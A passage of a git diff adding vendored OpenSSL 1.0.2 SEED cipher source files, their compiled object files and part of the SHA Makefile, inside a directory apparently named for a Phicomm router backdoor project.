+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/seed.h>
+#include <openssl/modes.h>
+
+void SEED_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                         size_t len, const SEED_KEY_SCHEDULE *ks,
+                         unsigned char ivec[SEED_BLOCK_SIZE], int *num,
+                         int enc)
+{
+    CRYPTO_cfb128_encrypt(in, out, len, ks, ivec, num, enc,
+                          (block128_f) SEED_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cfb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cfb.o
new file mode 100644
index 0000000000000000000000000000000000000000..14f92971716b097d262163cf08df73adb58919f5
GIT binary patch
literal 1648
zcmbtT&2G~`5FXcs76>6A4i-ho2ZTV-l~evg4=8Qw1W-hxHa!#xS+?s^iRMSPBPAT*
zfRK>5@ECoJO7I{Yxgu@|Da_bAinBNu7->8+-|n|FJ3D@7H|q<U1}qvphH1nofTd6U
zYT{PmJQU#Pg=@dsllz2x+PZGEzmxam{a51)G-|bV^X9HM?8QU#k+>_Y)$+q(5|-bt
zS;D$^D}{-&h+0BDh1z(&3kv`zgmK!-=#yw~wm}<}w3Wir@@FjcDq^H0SLkCGOZB2*
z7tN=|Ws2tr-Ek3qO!AiX+zwDJT+J*?PpY5ADAM8d-(Z3-&B604)|0NxQVJMe%G8<M
z9WfJ?`l!kS1oH6O92}w`*mwK`Px!E7+gs$8*D6lX^TY8V2B*<%ZEiH3R=vJscbv|~
zX47`koxG*Cz1QxvRH7`5J8%Z$bEv;3sa%xn^!9W|#!ZRiT+nPxMMUFn?0O)gI85y!
zdtq?oiZ~d>AoktZ1>r>z2*2O$20g@j{WuUfYpYT0`mbgDsy7saus;aGcnl&rAvkmn
zLbn@CbN+{CB9~@Qos24CB>awPl<sAp><TLNriz-Ck!*@3!Lw*74^NaK@f#9XC;5e3
zR}Gz!l{*;Fng7Z!BbUzPI?+vp^WSDbTF%dQ9dY)vTR&ujjIZu}hHEr?Gc$zoN69gz
zWyAgB*h7cTRQbnpLxnd=tMXqWp7(yo@<4tkdOzYapYgohl<FIOP%84m^iR>hrSb_=
c-wq)#Wd1!0GNSg6{?9!AiR2$;xa6w*Kfz>s{{R30

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ecb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ecb.c
new file mode 100644
index 0000000..937a31b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ecb.c
@@ -0,0 +1,61 @@
+/* crypto/seed/seed_ecb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/seed.h>
+
+void SEED_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      const SEED_KEY_SCHEDULE *ks, int enc)
+{
+    if (enc)
+        SEED_encrypt(in, out, ks);
+    else
+        SEED_decrypt(in, out, ks);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ecb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ecb.o
new file mode 100644
index 0000000000000000000000000000000000000000..494b0cb25dc0d76e779c569597d2c2d19ef90a93
GIT binary patch
literal 1616
zcmbtT&ubG=5T0#Xn`+cpJQS+3CsDMI#0qK;vTfZ2BwFYX@FL6Z=4ruZ6Lw#q5n8<n
z9{m&gr+D?|zu{55iBM<WzDYOFjR*Z;cE0)E%$xUX-}#-^jN<^qfyZzbu?kSHoN-T6
z4=zFteq6rs^TQW4_l-3Df%fL+ntN+68YXJ!J`$^<vC@1n)M4}ZUPCnQ-_B(!nMJFk
z&7rlQ@4*bfXVSRcRpbQc?KU`vb!WLYU;Ts&B>kEm0a!HtZ;tjf3*S%6aw?@erZw;?
zCaWrX)sq@U6*%{&sP*|NdUc9Ur!k2dhKq%D@}94wPUmN16@@b0o1#M|WjBy<Bx2a{
z{U<~NnZ)U6pde^>wl>x~!B(ra<L?H$>l+<EFli=5*K}o`k3AO92y~Yh(0-lfxI`j?
zblMZ^E^-3izcwAvM`WX(3M2F?&HX;JR33yv$wLLA8>$dQlw}~|ey=AJ)RMlE0^ih1
zro#A*iC-r}F-ZFZnW_;8J%ij2UZr7Aj$8f@aj}@*n*9<y)ChcUd6efeC%=qFXXBw2
z@q!Kp(a0T~M^AnD1uYr<rqS(}yKTm8M{^W$7XzB}U+bG#OLOu%k!o=NJ1iK_{n@Xf
z&b*j<R16B-&V7nw^tYMg8fU&Y%pEH^;qzlTLPB%e^(Q95-j`kf67$OL@1vQJ?}_e@
zYPp{EvfkACD}4|T&4%fpqJPY;C(XV)l%Q(*Kck=k`~0rpSXupvsXr*x61D4p1MVtw
ACjbBd

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_locl.h
new file mode 100644
index 0000000..96ec430
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_locl.h
@@ -0,0 +1,115 @@
+/*
+ * Copyright (c) 2007 KISA(Korea Information Security Agency). All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Neither the name of author nor the names of its contributors may
+ *    be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+#ifndef HEADER_SEED_LOCL_H
+# define HEADER_SEED_LOCL_H
+
+# include "openssl/e_os2.h"
+# include <openssl/seed.h>
+
+# ifdef SEED_LONG               /* need 32-bit type */
+typedef unsigned long seed_word;
+# else
+typedef unsigned int seed_word;
+# endif
+
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define G_FUNC(v)       \
+        SS[0][(unsigned char)      (v) & 0xff] ^ SS[1][(unsigned char) ((v)>>8) & 0xff] ^ \
+        SS[2][(unsigned char)((v)>>16) & 0xff] ^ SS[3][(unsigned char)((v)>>24) & 0xff]
+
+# define char2word(c, i)  \
+        (i) = ((((seed_word)(c)[0]) << 24) | (((seed_word)(c)[1]) << 16) | (((seed_word)(c)[2]) << 8) | ((seed_word)(c)[3]))
+
+# define word2char(l, c)  \
+        *((c)+0) = (unsigned char)((l)>>24) & 0xff; \
+        *((c)+1) = (unsigned char)((l)>>16) & 0xff; \
+        *((c)+2) = (unsigned char)((l)>> 8) & 0xff; \
+        *((c)+3) = (unsigned char)((l))     & 0xff
+
+# define KEYSCHEDULE_UPDATE0(T0, T1, X1, X2, X3, X4, KC)  \
+        (T0) = (X3);                                     \
+        (X3) = (((X3)<<8) ^ ((X4)>>24)) & 0xffffffff;    \
+        (X4) = (((X4)<<8) ^ ((T0)>>24)) & 0xffffffff;    \
+        (T0) = ((X1) + (X3) - (KC))     & 0xffffffff;    \
+        (T1) = ((X2) + (KC) - (X4))     & 0xffffffff
+
+# define KEYSCHEDULE_UPDATE1(T0, T1, X1, X2, X3, X4, KC)  \
+        (T0) = (X1);                                     \
+        (X1) = (((X1)>>8) ^ ((X2)<<24)) & 0xffffffff;    \
+        (X2) = (((X2)>>8) ^ ((T0)<<24)) & 0xffffffff;    \
+        (T0) = ((X1) + (X3) - (KC))     & 0xffffffff;     \
+        (T1) = ((X2) + (KC) - (X4))     & 0xffffffff
+
+# define KEYUPDATE_TEMP(T0, T1, K)   \
+        (K)[0] = G_FUNC((T0));      \
+        (K)[1] = G_FUNC((T1))
+
+# define XOR_SEEDBLOCK(DST, SRC)      \
+        ((DST))[0] ^= ((SRC))[0];    \
+        ((DST))[1] ^= ((SRC))[1];    \
+        ((DST))[2] ^= ((SRC))[2];    \
+        ((DST))[3] ^= ((SRC))[3]
+
+# define MOV_SEEDBLOCK(DST, SRC)      \
+        ((DST))[0] = ((SRC))[0];     \
+        ((DST))[1] = ((SRC))[1];     \
+        ((DST))[2] = ((SRC))[2];     \
+        ((DST))[3] = ((SRC))[3]
+
+# define CHAR2WORD(C, I)              \
+        char2word((C),    (I)[0]);    \
+        char2word((C+4),  (I)[1]);    \
+        char2word((C+8),  (I)[2]);    \
+        char2word((C+12), (I)[3])
+
+# define WORD2CHAR(I, C)              \
+        word2char((I)[0], (C));       \
+        word2char((I)[1], (C+4));     \
+        word2char((I)[2], (C+8));     \
+        word2char((I)[3], (C+12))
+
+# define E_SEED(T0, T1, X1, X2, X3, X4, rbase)   \
+        (T0) = (X3) ^ (ks->data)[(rbase)];       \
+        (T1) = (X4) ^ (ks->data)[(rbase)+1];     \
+        (T1) ^= (T0);                            \
+        (T1) = G_FUNC((T1));                     \
+        (T0) = ((T0) + (T1)) & 0xffffffff;       \
+        (T0) = G_FUNC((T0));                     \
+        (T1) = ((T1) + (T0)) & 0xffffffff;       \
+        (T1) = G_FUNC((T1));                     \
+        (T0) = ((T0) + (T1)) & 0xffffffff;       \
+        (X1) ^= (T0);                            \
+        (X2) ^= (T1)
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_SEED_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ofb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ofb.c
new file mode 100644
index 0000000..6974302
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ofb.c
@@ -0,0 +1,117 @@
+/* crypto/seed/seed_ofb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/seed.h>
+#include <openssl/modes.h>
+
+void SEED_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                         size_t len, const SEED_KEY_SCHEDULE *ks,
+                         unsigned char ivec[SEED_BLOCK_SIZE], int *num)
+{
+    CRYPTO_ofb128_encrypt(in, out, len, ks, ivec, num,
+                          (block128_f) SEED_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ofb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_ofb.o
new file mode 100644
index 0000000000000000000000000000000000000000..375f2daab4b6ee5fccf910f6a5932b7df6281ea3
GIT binary patch
literal 1648
zcmbtTPjAyu40o2n29&NK4wZ&bP6z~hO2@yl1L{`N7F1ERbrL(EDCsgLvHnr=DzzNo
z&<jUC#y-X*_#hlPa6#M<Qn8a~HGQNPu;keO#lL6A&-vgqYfFX!ECxJ*S;Q!SZO;5k
z>{j41<lyJpjbDw)_rml6f#2xSn0zUIhI+NSW!>8Mhdnv89*cXz-Y7j9#$oCGrY-FI
zw-cBs0L!Qa)N`oy7yGaTa7GxHy@o!C@opE4QNdWxt*m~+Mz14AN>ZdpBVVlLt!MdF
z3Kk1}<1+l1W@VU}6QEwWn|YQQcR!C&WWxEs!5CjzfM+*t##5Q6<S@LN>NEa!#4J>r
zqb?5-$ik}&aEOB7(Cr`jq62%5^OW4uX4wsTop3ym;MSY1o$aREs@3+Kw%gv`X*zC_
z$tl&{gO}}=PE?IuRQ3YeOQ^r6iL5D{?w-DpaZBO27qlBQ5z)9SJs(6Q!^9r57X~Mu
zkikfTIP|0k!jB>loqo3)^bqUyWgu|ZHX`YD-m3UbZzu*~e-MOn3?e=uIChUhuN%y2
z{)cBFmv&Fzj0$2Te2+<#<g!n89hGKNK~2j@4aHU<&6n!%M)A2f6|QgcE5*|dospKi
z7|@yj$}b_8&g4GPjfLyqVL(}~&vpxO_S318bdd7(+~@d?{=T^#!uX@&Sjw{D`El%{
zLucyzQ<YHWL}hjUYs9ne?^GSg_eA$cT;?;LRhvqEr3Xq`eK7q~^l#~W!t}dC2#Tuy
X0R<`1=XV9)W%17x|0KmFSLgo$>F9gX

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile
new file mode 100644
index 0000000..a8c0cf7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile
@@ -0,0 +1,175 @@
+#
+# OpenSSL/crypto/sha/Makefile
+#
+
+DIR=    sha
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+SHA1_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=shatest.c sha1test.c sha256t.c sha512t.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=sha_dgst.c sha1dgst.c sha_one.c sha1_one.c sha256.c sha512.c
+LIBOBJ=sha_dgst.o sha1dgst.o sha_one.o sha1_one.o sha256.o sha512.o $(SHA1_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= sha.h
+HEADER= sha_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+sha1-586.s:	asm/sha1-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha1-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha256-586.s:	asm/sha256-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha256-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha512-586.s:	asm/sha512-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha512-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sha1-ia64.s:   asm/sha1-ia64.pl
+	(cd asm; $(PERL) sha1-ia64.pl ../$@ $(CFLAGS))
+sha256-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+sha512-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+
+sha256-armv4.S: asm/sha256-armv4.pl
+	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-alpha.s:	asm/sha1-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/sha1-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# Solaris make has to be explicitly told
+sha1-x86_64.s:	asm/sha1-x86_64.pl;	$(PERL) asm/sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+sha1-mb-x86_64.s:	asm/sha1-mb-x86_64.pl;	$(PERL) asm/sha1-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha256-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha256-mb-x86_64.s:	asm/sha256-mb-x86_64.pl;	$(PERL) asm/sha256-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha512-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha1-sparcv9.S:	asm/sha1-sparcv9.pl;	$(PERL) asm/sha1-sparcv9.pl $@ $(CFLAGS)
+sha256-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+sha512-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+
+sha1-ppc.s:	asm/sha1-ppc.pl;	$(PERL) asm/sha1-ppc.pl $(PERLASM_SCHEME) $@
+sha256-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha512-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha256p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+sha512p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+
+sha1-parisc.s:	asm/sha1-parisc.pl;	$(PERL) asm/sha1-parisc.pl $(PERLASM_SCHEME) $@
+sha256-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+sha512-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+
+sha1-mips.S:	asm/sha1-mips.pl;	$(PERL) asm/sha1-mips.pl $(PERLASM_SCHEME) $@
+sha256-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+sha512-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+sha1-%.S:	asm/sha1-%.pl;		$(PERL) $< $(PERLASM_SCHEME) $@
+sha256-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+sha512-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-armv4-large.o:	sha1-armv4-large.S
+sha256-armv4.o:		sha256-armv4.S
+sha512-armv4.o:		sha512-armv4.S
+sha1-armv8.o:		sha1-armv8.S
+sha256-armv8.o:		sha256-armv8.S
+sha512-armv8.o:		sha512-armv8.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+sha1_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1_one.o: ../../include/openssl/opensslconf.h
+sha1_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1_one.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1_one.o: sha1_one.c
+sha1dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1dgst.o: ../../include/openssl/opensslconf.h
+sha1dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1dgst.o: ../md32_common.h sha1dgst.c sha_locl.h
+sha256.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
